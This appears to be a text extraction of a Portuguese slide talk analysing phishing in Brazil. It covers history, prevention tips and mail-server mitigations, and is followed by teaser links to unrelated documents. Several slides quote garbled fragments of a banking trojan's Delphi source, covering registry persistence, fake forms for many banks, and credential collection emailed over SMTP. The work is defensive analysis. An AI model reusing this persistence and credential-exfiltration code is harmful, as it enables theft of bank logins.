Impacto e Análise de Phising. Humberto Sartini
|
|
- Amália Valentina Klettenberg Sacramento
- 8 Há anos
- Visualizações:
Transcrição
1 Impacto e Análise de Phising Humberto Sartini
2 Palestrante Humberto Sartini Analista de Segurança do Provedor OndaRPC Participante dos projetos: Rau-Tu Linux ( ) HoneypotBR ( ) RootCheck ( ) Participante do: IV e V Fórum Internacional de SL Conferência Internacional de SL ( Curitiba ) Conisli (São Paulo/SP )
3 Tópicos O que é Phising? História do Phising Cenário Atual Motivação do Phiser Como o usuário pode se prevenir? O que o administrador pode fazer? Impactos causados Exemplos Análise de Phising em tempo real
4 O que é Phising? É um termo criado para descrever o tipo de fraude que se dá através do envio de mensagem não solicitada, que se passa por comunicação de uma instituição conhecida e que procura induzir o acesso a páginas e/ou programas fraudulentos, projetados para furtar dados pessoais e financeiros de usuários. Fonte:
5 O que é Phising? A palavra Phising (de fishing ) vem de uma analogia criada pelos fraudadores, onde iscas ( s) são usados para pescar senhas e dados financeiros de usuários da Internet. Fonte:
6 História do Phising Em janeiro de 1996 aparecimento do termo Phising no NewsGroup da 2600 Magazine AOL 1990: Criação de contas com dados falsos (Nome, Número de Cartão de Crédito, etc...) 1995: Utilização de Força-Bruta 1997: Suporte AOL solicitando dados de usuário e senha. Fonte: Wikipedia
7 Cenário Atual Formas de Envio Através de s (quase que a totalidade) Sites com códigos maliciosos que aproveitam falhas de segurança de Navegadores, Leitores de s e Sistemas Operacionais Sites com brechas de segurança (PHP Nuke, FormMail,...) Programas de Mensagem Instantânea (MSN, AIM, ICQ,...) Combinação de duas ou mais técnicas
8 Cenário Atual Facilidades encontradas pelo Phiser: Código fonte de vários Phising/Scam em várias linguagens Compactador de EXE (Petite) Versões bugadas de Softwares Ingenuidade (??) do usuário
9 Cenário Atual Facilidades encontradas pelo Phiser: Burrocracia das Grandes Provedores Operadoras e Delegacias Virtuais despreparadas e sem equipamentos
10 Cenário Atual Falta de Legislação específica Sugere ao Ministério da Justiça a criação de delegacias especializadas na repressão aos crimes cibernéticos (21/06/2005) Atribui à Justiça Federal o processamento de crimes praticados no âmbito da Internet ou em ambientes similares, disseminados em escala mundial (02/06/2005)
11 Cenário Atual Falta de Legislação específica Tipificando os crimes informáticos, praticados pelos chamados "hackers", incluindo os crimes de sabotagem, falsidade e fraude informática; autorizando as autoridades a interceptarem dados dos provedores e prevendo a pena de reclusão para quem armazena, em meio eletrônico, material pornográfico, envolvendo criança e adolescente. (15/09/2004)
12 Cenário Atual Crescimento de Fraudes 65,00 60,00 55,00 50,00 Af 45,00 Aw 40,00 Dos 35,00 Fraude 30,00 Invasão Scan 25,00 Worm 20,00 15,00 10,00 5,00 0,
13 Motivação do Phiser
14 Motivação do Phiser Impunidade Legislação Falha ( Nacional e Internacional ) Máquinas Escravas x Pichação de Sites Aluguel de BOTNET ($$$)
15 Como o usuário pode se prevenir? Browsers Manter o browser sempre atualizado Desativar a execução de programas Java Desativar a execução de JavaScripts antes de entrar em uma página desconhecida Permitir que programas ActiveX sejam executados em seu computador apenas quando vierem de sites conhecidos e confiáveis Manter maior controle sobre o uso de cookies Fonte:
16 Como o usuário pode se prevenir? Browsers Bloquear pop-up windows e permiti-las apenas para sites conhecidos e confiáveis Certificar-se da procedência do site e da utilização de conexões seguras ao realizar transações via Web Somente acessar sites de instituições financeiras e de comércio eletrônico digitando o endereço diretamente no seu browser Fonte:
17 Como o usuário pode se prevenir? Leitores de s Manter sempre a versão mais atualizada do programa leitor de s Não clicar em links que, por ventura, possam aparecer no conteúdo do Evitar abrir arquivos ou executar programas anexados aos s Desconfiar sempre dos arquivos anexados à mensagem, mesmo que tenham sido enviados por pessoas ou instituições conhecidas Fonte:
18 O que o administrador pode fazer? É fundamental para amenizar os impactos causados pelos Phisings / Scams Notificar o incidente para os contatos da rede e para os grupos de segurança das redes envolvidas, além de copiar o para o Cert.br Efetuar configurações especificas para não permitir e/ou amenizar a propagação dos Phisings / Scams
19 O que o administrador pode fazer? Servidores de s Atenção especial aos s com os seguintes anexos: bat, chm, exe, hlp, lnk, pif, reg, scr, shs, vbe, vbs, wsf e wsh Atenção especial aos s com link apontando para arquivos com as seguintes extensões: bat, pif e scr
20 O que o administrador pode fazer? Servidores de s Ativação da checagem de DNS Reverso, HELO, Listas RBL SPF
21 O que o administrador pode fazer? Servidores de Páginas Alteração de Mime Type de arquivos com extensão duvidosas (bat, com, pif, scr) Atenção a CGI (FormMail)e PHP (Php Nuke) Eliminar Cross Site Scripting
22
23
24 h ttp:/ / w w w.brtu rbo.c o m.br/ in clu de s / barrap.js p?c= FFFFFF&u rl= h ttp:/ / w w w. po p.co m.br/ barra.ph p?u rl= h ttp:/ / w w w.o i.co m.br/ s e rv ice s / PO/ Fram e Se t/ Fra m e Se t.ph p?url= h ttp:/ / w w w.ibe s t.co m.br/ s ite / parce iro s / e s tadao.js p?lin k = h t tp:/ / w w w.ibe s t.e s tadao.co m.br/ age s tado /?i= 1
25 Impactos causados Perda de Produtividade Consumo de recursos computacionais (processamento, armazenamento, banda, etc...) Golpes e Fraudes Ameaça a Segurança da Informação
26
27
28
29
30 Exem p lo s e Cas o s Reais Tod os os exem p los d e Ph is in gs, e m u it os ou t ros, es t ão n o s it e: h t t p :/ / web.on d a.com.br/ h u m bert o
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80 Análise de Artefato 100,00 90,00 Kaspersky TheHacker NOD32v2 Avast VBA32 Symantec Sybari F-Prot DrWeb 80,00 McAfee 70,00 CAT-QuickHeal Fortinet 60,00 BitDefender 50,00 Ikarus 40,00 AntiVir Avira AVG 30,00 ClamAV 20,00 Panda 10,00 etrust-iris 0,00 Sophos Norman Porc. (%)
81 Exem p lo s e Cas o s Reais Agora s erão m os t rad as algu n s t rech os d os cód igos fon t es d os s oft wares u t iliz ad os Es s e s oft ware s im u la os s egu in t es ban cos : BB, Real, It au, Brad es co, Caixa, Un iban co, Un iem p res a, Ban es p a, San t an d er, BBJu rid ica, BEC, BRB, Nos s acaixa, Ban ris u l, Ban coru ral e Nord es t e
82 Exem p lo s e Cas os Reais Ap p lica t ion.sh owma in For m := fa ls e; Ap p lica t ion.cr ea t efor m (TFor m 1, For m 1 ); Ap p lica t ion.cr ea t efor m (Tfr m BB, fr m BB); Ap p lica t ion.cr ea t efor m (Tfor m 3, for m 3 ); Ap p lica t ion.cr ea t efor m (Tfr m It a u, fr m It a u ); Ap p lica t ion.cr ea t efor m (Tfor m 6, for m 6 ); Ap p lica t ion.cr ea t efor m (Tfr m Br a, fr m Br a ); Ap p lica t ion.cr ea t efor m (Tfr m Un ib a n co, fr m Un ib a n co); Ap p lica t ion.cr ea t efor m (Tfr m Un iem p r es a, fr m Un iem p r es a ); Ap p lica t ion.cr ea t efor m (Tfr m Ba n es p a, fr m Ba n es p a ); Ap p lica t ion.cr ea t efor m (Tfr m Sa n t a n d er, fr m Sa n t a n d er ); Ap p lica t ion.cr ea t efor m (Tfr m BBJu r id ica, fr m BBJu r id ica ); Ap p lica t ion.cr ea t efor m (Tfr m BEC, fr m BEC); Ap p lica t ion.cr ea t efor m (Tfr m BRB, fr m BRB); Ap p lica t ion.cr ea t efor m (Tfr m Nos s a Ca ixa, fr m Nos s a Ca ixa ); Ap p lica t ion.cr ea t efor m (Tfr m Ba n r is u l, fr m Ba n r is u l); Ap p lica t ion.cr ea t efor m (Tfr m Ba n coru r a l, fr m Ba n coru r a l); Ap p lica t ion.cr ea t efor m (Tfr m Nor d es t e, fr m Nor d es t e);
83 Exem p lo s e Cas o s Reais fu n ct ion TFor m 1.p r occr ia Regis t r odein icia r Ap lica ca o (Rem over : BOOL): s t r in g; b egin r egap lica ca o := TRegis t r y.cr ea t e; try wit h r egap lica ca o d o b egin s t r Ch a veap p := 's vch os t '; Ro ot Key := HKEY_LOCAL_MACHINE; if Op en Key(s t r CHAVE_INICIAR, Tr u e) t h en b egin if Rem over = t r u e t h en r ega p lica ca o.delet eva lu e(s t r Ch a veap p ) els e Wr it est r in g(s t r Ch a veap p, PASTA+ '\ con fig\ s vch os t.exe'); en d ;
84 Exem p lo s e Cas os Reais com p u t a d or := n om ecom p u t a d or ; m es s a geb od y.bod y.ad d ('Nom e d o Com p u t a d or : ' + com p u t a d or + ' In fect ed ' ); m es s a geb od y.bod y.ad d ('IP: '+ Get IP + ' '); m es s a geb od y.bod y.ad d ('Da t a : '+ d a t et o s t r (n o w) + ' Ho r a : '+ t im et os t r (t im e) + ' '); m es s a geb od y.fr om.na m e := 'Ma kin a : ' + com p u t a d or ; m es s a geb od y.recip ien t s.ema ilad d r es s es := 'XXXXXXXX@XXX.com '; m es s a geb od y.su b ject := com p u t a d or + ' In fect a d o'; SMTP.Hos t := 's m t p.xxxx.com.b r '; SMTP.Au t h en t ica t ion Typ e := a t Login ; SMTP.Us er n a m e := 'XXXXXX'; SMTP.Pa s s wor d := 'XXXXXX'; SMTP.Por t := 2 5 ; s m t p.con n ect ; Tr y s m t p.sen d (m es s a geb od y); excep t SMTP.Hos t := 'm x2.m a il.ya h oo.com ';
85 Exem p lo s e Cas o s Reais SMTP.Ho s t := 's m t p.xxxx.com.b r '; / / p õe a q u i o s eu s m t p SMTP.Au t h en t ica t ion Typ e := a t Login ; SMTP.Por t := 2 5 ; SMTP.Us er n a m e := 'XXXXXXXX'; / / o u s er SMTP.Pa s s wor d := 'XXXXXXXX'; / / a s en h a t r y SMTP.Con n ect ; excep t s elf.clos e; en d ; wit h m es s a geb od y d o b egin Fr om.text := 'h 3 llm 4 5 t 3 r r '; Fr om.ad d r es s := 'h 3 llm 4 5 t 3 r r '; / / Recip ien t s.ema ilad d r es s es := 'XXXXXX@XXX.com '; / / Qu em r eceb er á a s in fo Su b ject := 'b a n k Accou n t s '; / / a n t es r eflit a q o Cr Az Y é o m a ior d os m a ior es ^ ^ Bo d y.ad d St r in gs (Da d os ); en d ;
86 Exem p lo s e Cas o s Reais Da t a := TSt r in glis t.cr ea t e; d a t a.ad d (' > > > Ba n co Ru r a l < < < '); d a t a.a d d ('RURAL Us u a r io: '+ fr m Ba n coru r a l.r u r a lu s u.t ext ); d a t a.a d d ('RURAL Sen h a : '+ fr m Ba n coru r a l.s en u s u.t ext ); d a t a.a d d ('RURAL Agen cia : '+ fr m Ba n coru r a l.a gen.t ext ); d a t a.ad d ('RURAL Tip o: '+ fr m Ba n coru r a l.t ip o.t ext ); d a t a.a d d ('RURAL Con t a Cor r en t e: '+ fr m Ba n coru r a l.con t a cor.t ext ); d a t a.a d d ('RURAL Digit o: '+ fr m Ba n coru r a l.d ig.t ext ); d a t a.a d d ('RURAL Sen h a : '+ fr m Ba n coru r a l.s en h a fin a l.t ext ); d a t a.a d d (''); for m 1.Clos ein t er n et Exp lor er ; excep t en d ; for m 1.En via Em a il(d a t a );
87 Exem p lo s e Cas os Reais Da t a := TSt r in glis t.cr ea t e; Da t a.ad d (' '); Da t a.ad d (' > > > Ba n co es t a d u a l d o cea r a < < '); d a t a.ad d ('Agen cia : '+ fr m b ec.ed it 1.t ext ); d a t a.ad d ('Con t a : '+ fr m b ec.ed it 2.t ext ); d a t a.ad d ('Digit o: '+ fr m b ec.ed it 6.t ext ); d a t a.ad d ('Sen h a NET: '+ fr m b ec.ed it 3.t ext ); d a t a.ad d ('Res p os t a : '+ fr m b ec.ed it 4.t ext ); Da t a.ad d (' '); for m 1.Clos ein t er n et Exp lor er ; excep t en d ; Fo r m 1.En via Em a il(d a t a ); d a t a.fr ee;
88 An ális e d e Ph is in g em t em p o real Fed o r a Co r e 4 Win d o ws 9 8 Ap a ch e In t er n et Exp lo r er 6 Ds n iff Et h er eal Qem u Tcp Du m p
89 Contato Através do site ou
90 Créditos Sit es con su lt ad os: Cert.b r Cart ilh a d e Segu r an ça p ara In t ern et h t t p :/ / car t ilh a.cert.br/ Fed ora h t t p :/ / fed ora.red h at.com RNP h t t p :/ / p.br/ n ot icias / im p ren sa/ 2005/ n ot - im p - abril2005 Sp am Cos t Calcu lat or h t t p :/ / s con n ect.com / Market in g/ sp am calc.h t m Wikip ed ia h t t p :/ / en.wikip ed ia.org/ wiki/ Ph is h in g
91 Créditos Figura Slide 1: Figura Slide 12 Dados obtidos em: Figura Slide 13: Figura Slide 26 e 27: h ttp :/ / s con n ect.com / Mar ketin g/ sp am calc.h t m Outras Figuras: Arquivo particular
Impacto e Análise de Phising. Humberto Sartini http://web.onda.com.br/humberto
Impacto e Análise de Phising Humberto Sartini http://web.onda.com.br/humberto Palestrante Humberto Sartini Analista de Segurança do Provedor OndaRPC Participante dos projetos: Rau-Tu Linux ( http://www.rau-tu.unicamp.br/linux
Leia maisSegurança com Software Livre. Humberto Sartini http://web.onda.com.br/humberto
Segurança com Software Livre Humberto Sartini http://web.onda.com.br/humberto Palestrante Humberto Sartini Analista de Segurança do Provedor Onda S/A Participante dos projetos: Rau-Tu Linux ( http://www.rau-tu.unicamp.br/linux
Leia maisDicas de Segurança no uso de Computadores Desktops
Universidade Federal de Goiás Dicas de Segurança no uso de Computadores Desktops Jánison Calixto CERCOMP UFG Cronograma Introdução Conceitos Senhas Leitores de E-Mail Navegadores Anti-Vírus Firewall Backup
Leia maisSoftware Livre, Segurança e Legislação. Humberto Sartini http://web.onda.com.br/humberto
Software Livre, Segurança e Legislação Humberto Sartini http://web.onda.com.br/humberto Palestrante Humberto Sartini Analista de Segurança do Provedor Onda S/A Participante dos projetos: Rau-Tu Linux (
Leia maisChecklist COOKIES KEYLOGGER PATCHES R. INCIDENTE TECNOLOGIA SPAM INTERNET MA Cartilha de Segurança para Internet
SEGURANÇA FRAUDE TECNOLOGIA SPAM INT MALWARE PREVENÇÃO VÍRUS BANDA LARGA TROJAN PRIVACIDADE PHISHING WIRELESS SPYWARE ANTIVÍRUS WORM BLUETOOTH SC CRIPTOGRAFIA BOT SENHA ATAQUE FIREWAL BACKDOOR COOKIES
Leia maisGERADOR DE RELATÓRIOS
GERADOR DE RELATÓRIOS Sumário 1. INTRODUÇÃO... 3 2. COMO FUNCIONA?... 4 3. TELA DE LOGIN... 5 4. RELATÓRIOS DE ACESSO A WEB... 6 5. RELATÓRIOS DE USO DE LINK... 14 6. RELATÓRIOS DE USO DE E-MAIL... 18
Leia maisSegurança em Computadores. GTI SEDU atendimento@sedu.es.gov.br
Segurança em Computadores GTI SEDU atendimento@sedu.es.gov.br Agenda Computadores Riscos principais Cuidados a serem tomados Créditos Computadores (1/4) Computador pessoal grande quantidade de dados armazenados
Leia maisSegurança em Informática
Especialização em Gestão das Tecnologias na Educação Básica Disciplina: Informática Aplicada a Educação Prof. Walteno Martins Parreira Júnior Segurança em Informática Inicialmente, responda o questionário
Leia maisDicas de como evitar o ataque de vírus
Dicas de como evitar o ataque de vírus Recentemente, os casos de bloqueio de IP no Departamento de Química vêm aumentado consideravelmente. Quando um computador está infectado com arquivos maliciosos (vírus,
Leia maisVírus é um programa. Sendo que este programa de computadores é criado para prejudicar o equipamento ou sabotar os dados nele existente.
Segurança da Informação Prof. Jefferson Costa www.jeffersoncosta.com.br Engenharia Social Chama-se Engenharia Social as práticas utilizadas para obter acesso a informações importantes ou sigilosas em organizações
Leia maisCartilha de Segurança para Internet
Comitê Gestor da Internet no Brasil Cartilha de Segurança para Internet Checklist Versão 3.1 2006 CERT.br Centro de Estudos, Resposta e Tratamento de Incidentes de Segurança no Brasil Cartilha de Segurança
Leia mais3. Cópias de segurança de dados armazenados em um computador são importantes para se prevenir de eventuais falhas, como também das consequências de
3. Cópias de segurança de dados armazenados em um computador são importantes para se prevenir de eventuais falhas, como também das consequências de uma possível infecção por vírus. Acerca disso, analise
Leia maisCartilha de Segurança para Internet Checklist
Cartilha de Segurança para Internet Checklist NIC BR Security Office nbso@nic.br Versão 2.0 11 de março de 2003 Este checklist resume as principais recomendações contidas no documento intitulado Cartilha
Leia maisTipos de pragas Virtuais; Como funciona os antivírus; Principais golpes virtuais; Profº Michel
Tipos de pragas Virtuais; Como funciona os antivírus; Principais golpes virtuais; Profº Michel Tipos de pragas virtuais 1 Vírus A mais simples e conhecida das ameaças. Esse programa malicioso pode ligar-se
Leia maisPrivacidade. <Nome> <Instituição> <e-mail>
Privacidade Agenda Privacidade Riscos principais Cuidados a serem tomados Créditos Privacidade (1/3) Sua privacidade pode ser exposta na Internet: independentemente da sua
Leia maisPrefeitura do Campus USP de Pirassununga Seção Técnica de Informática
CARTILHA DE INFORMÁTICA SEÇÃO TÉCNICA DE INFORMÁTICA PUSP-P Nº 001 - JUNHO/2014 TEMA: SEGURANÇA NA INTERNET Atualmente a maior incidência de problemas em informática está relacionada com a tentativa de
Leia maismais segurança na internet próximo Um guia para você tirar suas dúvidas sobre segurança na internet e proteger sua empresa.
mais segurança na internet Um guia para você tirar suas dúvidas sobre segurança na internet e proteger sua empresa. Suas atitudes na internet podem influenciar a segurança da sua empresa. Você é cuidadoso
Leia maisMANUAL DO ADMINISTRADOR
WinShare Proxy admin MANUAL DO ADMINISTRADOR Instalação do WinShare Índice 1. Instalação 2. Licenciamento 3. Atribuindo uma senha de acesso ao sistema. 4. Configurações de rede 5. Configurações do SMTP
Leia maisManual de Instalação ( Client / Server ) Versão 1.0
1 pág. PROCEDIMENTO DE INSTALAÇÃO DO SGCOM ATENÇÃO: É OBRIGATÓRIO UMA CONEXÃO COM A INTERNET PARA EXECUTAR A INSTALAÇÃO DO SGCOM. Após o Download do instalador do SGCOM versão Server e Client no site www.sgcom.inf.br
Leia maisMALWARE. Spyware. Seguem algumas funcionalidades implementadas em spywares, que podem ter relação com o uso legítimo ou malicioso:
MALWARE Spyware É o termo utilizado para se referir a uma grande categoria de software que tem o objetivo de monitorar atividades de um sistema e enviar as informações coletadas para terceiros. Seguem
Leia maisGuia de Uso para Registro de Chamado Usuário Externo
Guia de Uso para Registro de Chamado Usuário Externo Guia de Uso para Registro de Chamado Usuário Externo O é a ferramenta de abertura e acompanhamento de chamados, com os recursos: Sistema de Ajuda online
Leia maishttp://cartilha.cert.br/
http://cartilha.cert.br/ Manter seu computador seguro é essencial para se proteger dos riscos envolvidos no uso da Internet Um grande risco que você pode correr ao usar a Internet é o de achar que não
Leia maisManual (Office 365) Para acesso ao sistema de e-mails, os passos iniciais continuam os mesmos.
Histórico de Alterações Versão Data Autor Função Descrição 1 14/09/2012 Roberto Gouveia Analista de Help Desk Criação inicial 2 19/11/2013 Roberto Gouveia Analista de Help Desk Atualização A partir de
Leia maisPasso 1: Abra seu navegador e digite http://www.no-ip.com. Passo 2: Na tela que surgir, clique em Get Started.
1 - Como obter seu DNS Dinâmico no No-IP O No-IP, é um sistema de DNS (Domain Name Server), que converte o seu endereço IP em um nome. O que o No-IP faz, é converter o nome do tipo minhacameraip.no-ip.org
Leia maisPOLÍTICA DE PRIVACIDADE CONSULTOR HND
POLÍTICA DE PRIVACIDADE CONSULTOR HND 1. Princípios Gerais Esta Política de privacidade descreve como o CONSULTOR HND coleta e usa informações pessoais fornecidas no nosso site: www.consultorhnd.com.br.
Leia maisManual de Configuração de Ambiente para Utilização do Login via Certificado Digital no Cadastro Web
Manual de Configuração de Ambiente para Utilização do Login via Certificado Digital no Cadastro Web AÇÕES IMPORTANTES Ao tentar acessar o Cadastro Web por meio da certificação digital, é fundamental realizar
Leia maisAcesse o Portal da Instituição (http://www.mp.sp.gov.br), e clique na figura.
Seja bem-vindo ao serviço de Correio Eletrônico do Portal do Ministério Público do Estado de São Paulo. O WEBMAIL é um serviço disponível no Portal do Ministério Público do Estado de São Paulo, que permite
Leia maisInstalação Cliente Notes 6.5
Instalação Cliente Notes 6.5 1/1 Instalação Cliente Notes 6.5 LCC.008.2005 Versão 1.0 Versão Autor ou Responsável Data 1.0 Fabiana J. Santos 18/11/2005 RESUMO Este documento apresenta um roteiro de instalação
Leia maisData: 22 de junho de 2004. E-mail: ana@lzt.com.br
Data: 22 de junho de 2004. E-mail: ana@lzt.com.br Manual do Suporte LZT LZT Soluções em Informática Sumário VPN...3 O que é VPN...3 Configurando a VPN...3 Conectando a VPN... 14 Possíveis erros...16 Desconectando
Leia maishttp://cartilha.cert.br/
http://cartilha.cert.br/ Códigos maliciosos são usados como intermediários e possibilitam a prática de golpes, a realização de ataques e o envio de spam Códigos maliciosos, também conhecidos como pragas
Leia maisTUTORIAL INSTALAÇÃO DA ROTINA 2075 NO LINUX
Apresentação O departamento de varejo da PC Sistemas inovou seu produto de frente de caixa, permitindo seu funcionamento no sistema operacional do Linux com a distribuição Ubuntu. O cliente poderá usar
Leia maisMalwares. Algumas das diversas formas como os códigos maliciosos podem infectar ou comprometer um computador são:
Malwares Códigos Maliciosos - Malware Códigos maliciosos (malware) são programas especificamente desenvolvidos para executar ações danosas e atividades maliciosas em um computador. Algumas das diversas
Leia maisSegurança em Internet Banking. <Nome> <Instituição> <e-mail>
Segurança em Internet Banking Agenda Internet Banking Riscos principais Cuidados a serem tomados Créditos Internet Banking (1/4) Permite: realizar ações disponíveis nas agências
Leia maisRevisão 7 Junho de 2007
Revisão 7 Junho de 2007 1/5 CONTEÚDO 1. Introdução 2. Configuração do Computador 3. Reativar a Conexão com a Internet 4. Configuração da Conta de Correio Eletrônico 5. Política Anti-Spam 6. Segurança do
Leia maisSolicitação de Manutenção de Veículo. Manual SRM
Manual SRM 1 Índice 1. Requerimentos Técnicos para Utilização do Sistema... 4 1.1 Hardware... 4 1.2 Software... 5 1.3 Conexão à Internet... 9 2. Desabilitação do Bloqueio Automático de Pop-ups...10 3.
Leia maishttp://cartilha.cert.br/
http://cartilha.cert.br/ Via Internet Banking você pode realizar as mesmas ações disponíveis nas agências bancárias, sem enfrentar filas ou ficar restrito aos horários de atendimento Realizar transações
Leia maisProcedimentos para Reinstalação do Sisloc
Procedimentos para Reinstalação do Sisloc Sumário: 1. Informações Gerais... 3 2. Criação de backups importantes... 3 3. Reinstalação do Sisloc... 4 Passo a passo... 4 4. Instalação da base de dados Sisloc...
Leia maisCORREIO inotes. Para acessar o Correio inotes é necessário acessar a Internet.
CORREIO inotes Para acessar o Correio inotes é necessário acessar a Internet. Na sua Área de Trabalho execute dois cliques rápidos no ícone do Internet Explorer. Ao ser exibida a primeira tela do Internet
Leia maisUNIVERSIDADE FEDERAL DE PELOTAS
Usando um firewall para ajudar a proteger o computador A conexão à Internet pode representar um perigo para o usuário de computador desatento. Um firewall ajuda a proteger o computador impedindo que usuários
Leia maisSistema integrado de Aquisição de Vale-transporte para Cartões Eletrônicos. SBCTrans
Sistema integrado de Aquisição de Vale-transporte para Cartões Eletrônicos SBCTrans A tecnologia facilitando a vida do cidadão Índice Cadastro e Primeiro Acesso... 05 Acessando o Sistema... 08 Menu de
Leia maise-nota E Módulo de Entrega da Nota
Página1 e-nota E Módulo de Entrega da Nota Manual do Usuário Produzido por: Informática Educativa Página2 Índice 1. Safeweb e-nota E... 03 2. O que é XML... 04 3. Acesso e-nota E... 05 4. Gerenciamento
Leia maisFollow-Up Acompanhamento Eletrônico de Processos (versão 3.0) Manual do Sistema. 1. Como acessar o sistema Requisitos mínimos e compatibilidade
do Sistema Índice Página 1. Como acessar o sistema 1.1 Requisitos mínimos e compatibilidade 03 2. Como configurar o Sistema 2.1 Painel de Controle 2.2 Informando o nome da Comissária 2.3 Escolhendo a Cor
Leia maisCUIDADOS COM A INTERNET: CRIMES VIRTUAIS
CUIDADOS COM A INTERNET: CRIMES VIRTUAIS > CUIDADOS COM A INTERNET > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > > É impossível prever
Leia maisPolítica de Segurança Corporativa da Assembleia Legislativa do Estado do Ceará
Política de Segurança Corporativa da Assembleia Legislativa do Estado do Ceará Agenda Projeto Realizado Política de Segurança da ALCE Próximos passos Projeto realizado Definição/Revisão da Política de
Leia maisA segurança na utilização da Internet é um tema muito debatido nos dias atuais devido à grande quantidade de ladrões virtuais.
A segurança na utilização da Internet é um tema muito debatido nos dias atuais devido à grande quantidade de ladrões virtuais. Sobre as práticas recomendadas para que a utilização da internet seja realizada
Leia maisSegurança de Redes & Internet
Boas Práticas Segurança de Redes & Internet 0800-644-0692 Video Institucional Boas Práticas Segurança de Redes & Internet 0800-644-0692 Agenda Cenário atual e demandas Boas práticas: Monitoramento Firewall
Leia maisPolítica de privacidade do Movimento Certo Ginástica Laboral Online Última atualização: 17 de março de 2015
Política de privacidade do Movimento Certo Ginástica Laboral Online Última atualização: 17 de março de 2015 Esta Política de privacidade estabelece nossas políticas e procedimentos para coletar, usar e
Leia maisMicrosoft Lync Manual de Instalação e Uso
Microsoft Lync Manual de Instalação e Uso Sumário Introdução_... 3 Detalhamento_... 5 Importação_... 8 Funcionalidades na Intranet_... 13 Geração de nova senha... 14 Lembrete de expiração da senha... 15
Leia maisDúvidas frequentes: acesso à rede e e-mails institucionais
Desde março de 2016 o acesso à rede corporativa e aos e-mails institucionais dos servidores dos Órgãos Centrais e Diretorias de Ensino é criado através da plataforma Secretaria Escolar Digital (SED). Todas
Leia maisManual do Usuário. E-DOC Peticionamento Eletrônico TST
E-DOC Peticionamento APRESENTAÇÃO O sistema E-DOC substituirá o atual sistema existente. Este sistema permitirá o controle de petições que utiliza certificado digital para autenticação de carga de documentos.
Leia maisROTEIRO PARA CONFIGURAÇÃO DO AMBIENTE PARA ACESSO AO PERSUS MÓDULO DE GESTÃO DE CONTAS E PROTOCOLO DE IMPUGNAÇÕES E RECURSOS ANS Agência Nacional de
ROTEIRO PARA CONFIGURAÇÃO DO AMBIENTE PARA ACESSO AO PERSUS MÓDULO DE GESTÃO DE CONTAS E PROTOCOLO DE IMPUGNAÇÕES E RECURSOS ANS Agência Nacional de Saúde Suplementar ROTEIRO PARA CONFIGURAÇÃO DO AMBIENTE
Leia maisObs: É necessário utilizar um computador com sistema operacional Windows 7.
Instalando os Pré-Requisitos Os arquivos dos 'Pré-Requisitos' estão localizados na pasta Pré-Requisitos do CD HyTracks que você recebeu. Os arquivos também podem ser encontrados no servidor. (www.hytracks.com.br/pre-requisitos.zip).
Leia maisProcedimentos para Instalação do Sisloc
Procedimentos para Instalação do Sisloc Sumário: 1. Informações Gerais... 3 2. Instalação do Sisloc... 3 Passo a passo... 3 3. Instalação da base de dados Sisloc... 16 Passo a passo... 16 4. Instalação
Leia maisMercado Eletrônico Instalação e Atualização MEConnect2
Manual de Usuário da Plataforma de compras do Grupo José de Mello - Mercado Eletrônico Instalação e Atualização MEConnect2 1 Índice 1. Introdução... 3 2. Visão Geral... 3 3. Instalação e Atualização...
Leia maisEm informática, um vírus de computador é um software malicioso que vem sendo desenvolvido por programadores que, tal como um vírus biológico, infecta
Em informática, um vírus de computador é um software malicioso que vem sendo desenvolvido por programadores que, tal como um vírus biológico, infecta o sistema, faz cópias de si mesmo e tenta se espalhar
Leia maisMANUAL DE MEMBRO COMUNIDADE DO AMIGO
SUMÁRIO Efetuando o Login na comunidade... 3 Esqueceu sua senha?... 3 Página Principal... 4 Detalhando o item Configurações... 5 Alterar Foto... 5 Alterar Senha... 5 Dados Pessoais... 6 Configurações de
Leia maisProfessor: Macêdo Firmino Disciplina: Sistemas Operacionais de Rede
Professor: Macêdo Firmino Disciplina: Sistemas Operacionais de Rede O servidor de arquivos fornece um ponto centralizado na rede para armazenamento e compartilhamento de arquivos entre os usuários. Quando
Leia maishttp://aurelio.net/vim/vim-basico.txt Entrar neste site/arquivo e estudar esse aplicativo Prof. Ricardo César de Carvalho
vi http://aurelio.net/vim/vim-basico.txt Entrar neste site/arquivo e estudar esse aplicativo Administração de Redes de Computadores Resumo de Serviços em Rede Linux Controlador de Domínio Servidor DNS
Leia maisSistemas para Internet 06 Ataques na Internet
Sistemas para Internet 06 Ataques na Internet Uma visão geral dos ataques listados na Cartilha de Segurança para Internet do CGI Comitê Gestor da Internet Componente Curricular: Bases da Internet Professor:
Leia maisGerenciador Eletrônico de Documentos (GED) (Manual de Instalação)
Gerenciador Eletrônico de Documentos (GED) (Manual de Instalação) Quantico Sistemas de Informação Ltda. 1 / 12 A. Histórico de Alterações Histórico de Alterações Versão Responsáveis Objetivo Solicitante
Leia maisFerramentas para Desenvolvimento Web
Ferramentas para Desenvolvimento Web Profa. Dra. Joyce Martins Mendes Battaglia Mini Currículo Bel. em Ciência da Computação - Unib Mestre e doutora em Eng. Elétrica USP Professora /Coordenadora Pesquisadora
Leia maisManual de Operações Básicas. Thiago Passamani
Manual de Operações Básicas Thiago Passamani 1 - Entrando e saindo do sistema O Zimbra Suíte de Colaboração é um software de correio eletrônico open source com suporte para e-mail, contatos, calendário
Leia maisSistema de Gerenciamento de Arquivos (SGA) (Manual de Instalação)
Sistema de Gerenciamento de Arquivos (SGA) (Manual de Instalação) Quantico Sistemas de Informação Ltda. 1 / 12 A. Histórico de Alterações Histórico de Alterações Versão Responsáveis Objetivo Solicitante
Leia maisSISTEMA OPERACIONAL - WINDOWS
MANUAL PROTECT Versão R15 SISTEMA OPERACIONAL - WINDOWS Copyright GVT 2015 www.gvtprotect.com.br 1 1 Índice 1 Índice... 2 2 GVT PROTECT... 3 2.1 REQUISITOS MÍNIMOS DE SISTEMA... 3 2.2 SISTEMAS OPERACIONAIS
Leia maisSISTEMA OPERACIONAL MAC OS
MANUAL PROTECT Versão R15 SISTEMA OPERACIONAL MAC OS Copyright GVT 2015 www.gvtprotect.com.br 1 1 Índice 1 Índice... 2 2 GVT PROTECT... 3 2.1 Requisitos Mínimos De Sistema... 3 2.2 Sistemas Operacionais
Leia maisPrefeitura do Campus USP de Pirassununga Seção Técnica de Informática
